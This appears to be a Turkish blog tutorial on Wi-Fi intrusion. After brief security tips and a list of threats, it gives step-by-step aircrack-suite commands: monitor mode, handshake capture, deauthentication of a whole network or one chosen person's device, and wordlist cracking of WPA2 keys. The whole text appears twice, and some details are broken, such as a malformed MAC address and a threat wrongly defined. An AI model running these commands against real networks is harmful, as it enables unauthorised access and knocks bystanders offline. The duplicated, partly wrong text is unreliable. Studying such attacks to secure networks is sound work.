- 17 Nis 2021
- 72
- 27
Kablosuz Ağ Sızması
Saldırgan taraflar, güvenliği sağlanamamış Kablosuz Ağlara sızma girişimlerinde bulunarak sizleri phishing sitelerine yönlendirebilir, kredi kartı bilgilerinizi kopyalayabilir, kişisel verilerinizi rahatça değiştirebilir ve alabilir. Kablosuz ağların en güvenliksiz olduğu yerler halka açık kafeler, salonlar, kıraathaneler, spor salonları vb. Saldırgan taraflar, bu yerlerdeki kablosuz ağlara sızıp birçok kişinin bilgisine rahatça erişebilir.
Kablosuz Ağ Güvenliği Sağlama Yöntemleri
1.Varsayılan kullanıcı adını değiştirmek.
2.Kaba Kuvvet saldırılarının önüne geçmek için benzersiz ve eşsiz şifre koymak.
3.Güçlü ağ şifreleme kullanmak (WPA, WPA2)
4.Kablosuz ağ yazılımınızı güncel tutmak.
5.FireWall (Güvenlik Duvarı) kullanmak.
6.WPS özelliğinizi kapatmak.
Ağ Türleri
*Wireless personal area network (WPAN)
*Wireless local area network (WLAN)
*Wireless metropolitian area network (WMAN)
*Wireless wide are network (WWAN)
Dağıtım Ağ Türleri
-Extension to a wired network
- Multiple to a wired network
- 3G/4G/5G hotspot
Wi-Fi Tehditleri
Erişim kontrol saldırısı: Yetkisiz bir ağa erişim elde eden saldırganlar.
Bütünlük ve gizlilik saldırıları: Saldırganlar, meşru kullanıcıların ağa erişmesini engeller.
Kimlik doğrulama saldırıları: Saldırgan, ağın meşru kullanıcılarını taklit etmeye çalışır.
Rogue Access: Saldırganlar, aynı konumdaki mevcut ve meşru bir SSID ile aynı SSID ile bir hileli erişim noktası başlatarak, ağa ve mevcut trafiğe erişim sağlamaya çalışır.
Hacking Wireless Network Uygulama
Gerekenler;
- Harici Wi-Fi anteni
* Laptop Antenleri Monitör Moda sahip değildir.
- Airmon-ng
- Airodump-ng
1.Adım = ifconfig
- Adaptörümü bağladıktan sonra komut satırında root olarak ifconfig komutu çalıştırılır.
2.Adım = Wifi Kullanılıyorsa Kapatmak
- Komut satırına root olarak airmon-ng check kill komutu yazılır.
- Neden kapatıyorum? Çünkü monitör moda çekeceğim. Normal çalıştığı haliyle anteni kullanamam. Bundan dolayı ilk yapılan iş wirelessin kapatılmasıdır.
3.Adım = Anteni Monitör Moda Geçirmek
- Komut satırında root olarak sudo ip link set wlan0 down komutu çalışıtırılır, ardından;
- Komut satırında root olarak sudo iw dev wlan0 set type monitor komutu çalıştırılır.
- Komut satırında root olarak sudo ip link set wlan0 up komutu çalıştırılarak adaptör tekrar aktif hale gelir.
* ip ve iw komutları yoksa bunları yüklememiz gerekir.
4.Adım = İnjection Test Etmek
- Komut satırına aireplay-ng -9 wlan0 yazılarak, etraftaki ağlara enjeksiyon yapabilir miyim diye yalnızca bunu test ediyorum.
5.Adım = wlan0 Monitör Modda Başlatmak
- Komut satırına root olarak airmon-ng start wlan0 komutu çalıştırılır. (monitor modda mı diye kontrol edilir.)
- Burada adaptörümüz için monitor mode already enabled yazısını görürsek, adaptörümüzün monitor modda olduğunu anlarız.
6.Adım = Çevredeki Wifileri Tespit Etme
- Komut satırına root olarak airodump-ng wlan0 komutu çalıştırılır.
7.Adım = Hedef AP-MAC Adresi Alınır
- Komut satırında root olarak airodump-ng -c 2 bssid X:X:X:X:X:X -w furkanSaldiri komutu çalıştırılır.
8.Adım = Yeni Bağlantı Açıp, Hedefin Bağlantısını Düşürmek
- Komut satırında root olarak aireplay-ng -0 50 -a 3C:468:963:7D wlan0 komutu çalıştırılır. Burada tüm ağ düşürülür.
- Sadece belirli bir kişinin cihazını düşürmek istersek aireplay-ng --deauth 10000 -a [AĞ MAC] -c [CİHAZ MAC] wlan0 komutunu kullanabiliriz.
9.Adım = Decrypt Etme
- Komut satırında WPA Handshake: X:X:X:X:X:X
10.Adım = Decrypt İçin Aircrack Kullanmak
- aircrack-ng -a2 -b 3C:468:963:7D -w /root/password.txt /root/handshake-01.cap
- Komutta yer alan password.txt biz de oluşturabiliriz ya da hazır olarak internetten indirebiliriz.
- Kalide var olanları şu şekilde listeleyebiliriz; ls /usr/share/wordlist
11.Adım = Monitor Modu Kapatıp Networkü Normale Döndürmek
- airmon-ng stop wlan0
12.Adım = Networku Çalıştırmak
- systemctl start NetworkManager
Saldırgan taraflar, güvenliği sağlanamamış Kablosuz Ağlara sızma girişimlerinde bulunarak sizleri phishing sitelerine yönlendirebilir, kredi kartı bilgilerinizi kopyalayabilir, kişisel verilerinizi rahatça değiştirebilir ve alabilir. Kablosuz ağların en güvenliksiz olduğu yerler halka açık kafeler, salonlar, kıraathaneler, spor salonları vb. Saldırgan taraflar, bu yerlerdeki kablosuz ağlara sızıp birçok kişinin bilgisine rahatça erişebilir.
Kablosuz Ağ Güvenliği Sağlama Yöntemleri
1.Varsayılan kullanıcı adını değiştirmek.
2.Kaba Kuvvet saldırılarının önüne geçmek için benzersiz ve eşsiz şifre koymak.
3.Güçlü ağ şifreleme kullanmak (WPA, WPA2)
4.Kablosuz ağ yazılımınızı güncel tutmak.
5.FireWall (Güvenlik Duvarı) kullanmak.
6.WPS özelliğinizi kapatmak.
Ağ Türleri
*Wireless personal area network (WPAN)
*Wireless local area network (WLAN)
*Wireless metropolitian area network (WMAN)
*Wireless wide are network (WWAN)
Dağıtım Ağ Türleri
-Extension to a wired network
- Multiple to a wired network
- 3G/4G/5G hotspot
Wi-Fi Tehditleri
Erişim kontrol saldırısı: Yetkisiz bir ağa erişim elde eden saldırganlar.
Bütünlük ve gizlilik saldırıları: Saldırganlar, meşru kullanıcıların ağa erişmesini engeller.
Kimlik doğrulama saldırıları: Saldırgan, ağın meşru kullanıcılarını taklit etmeye çalışır.
Rogue Access: Saldırganlar, aynı konumdaki mevcut ve meşru bir SSID ile aynı SSID ile bir hileli erişim noktası başlatarak, ağa ve mevcut trafiğe erişim sağlamaya çalışır.
Hacking Wireless Network Uygulama
Gerekenler;
- Harici Wi-Fi anteni
* Laptop Antenleri Monitör Moda sahip değildir.
- Airmon-ng
- Airodump-ng
1.Adım = ifconfig
- Adaptörümü bağladıktan sonra komut satırında root olarak ifconfig komutu çalıştırılır.
2.Adım = Wifi Kullanılıyorsa Kapatmak
- Komut satırına root olarak airmon-ng check kill komutu yazılır.
- Neden kapatıyorum? Çünkü monitör moda çekeceğim. Normal çalıştığı haliyle anteni kullanamam. Bundan dolayı ilk yapılan iş wirelessin kapatılmasıdır.
3.Adım = Anteni Monitör Moda Geçirmek
- Komut satırında root olarak sudo ip link set wlan0 down komutu çalışıtırılır, ardından;
- Komut satırında root olarak sudo iw dev wlan0 set type monitor komutu çalıştırılır.
- Komut satırında root olarak sudo ip link set wlan0 up komutu çalıştırılarak adaptör tekrar aktif hale gelir.
* ip ve iw komutları yoksa bunları yüklememiz gerekir.
4.Adım = İnjection Test Etmek
- Komut satırına aireplay-ng -9 wlan0 yazılarak, etraftaki ağlara enjeksiyon yapabilir miyim diye yalnızca bunu test ediyorum.
5.Adım = wlan0 Monitör Modda Başlatmak
- Komut satırına root olarak airmon-ng start wlan0 komutu çalıştırılır. (monitor modda mı diye kontrol edilir.)
- Burada adaptörümüz için monitor mode already enabled yazısını görürsek, adaptörümüzün monitor modda olduğunu anlarız.
6.Adım = Çevredeki Wifileri Tespit Etme
- Komut satırına root olarak airodump-ng wlan0 komutu çalıştırılır.
7.Adım = Hedef AP-MAC Adresi Alınır
- Komut satırında root olarak airodump-ng -c 2 bssid X:X:X:X:X:X -w furkanSaldiri komutu çalıştırılır.
8.Adım = Yeni Bağlantı Açıp, Hedefin Bağlantısını Düşürmek
- Komut satırında root olarak aireplay-ng -0 50 -a 3C:468:963:7D wlan0 komutu çalıştırılır. Burada tüm ağ düşürülür.
- Sadece belirli bir kişinin cihazını düşürmek istersek aireplay-ng --deauth 10000 -a [AĞ MAC] -c [CİHAZ MAC] wlan0 komutunu kullanabiliriz.
9.Adım = Decrypt Etme
- Komut satırında WPA Handshake: X:X:X:X:X:X
10.Adım = Decrypt İçin Aircrack Kullanmak
- aircrack-ng -a2 -b 3C:468:963:7D -w /root/password.txt /root/handshake-01.cap
- Komutta yer alan password.txt biz de oluşturabiliriz ya da hazır olarak internetten indirebiliriz.
- Kalide var olanları şu şekilde listeleyebiliriz; ls /usr/share/wordlist
11.Adım = Monitor Modu Kapatıp Networkü Normale Döndürmek
- airmon-ng stop wlan0
12.Adım = Networku Çalıştırmak
- systemctl start NetworkManager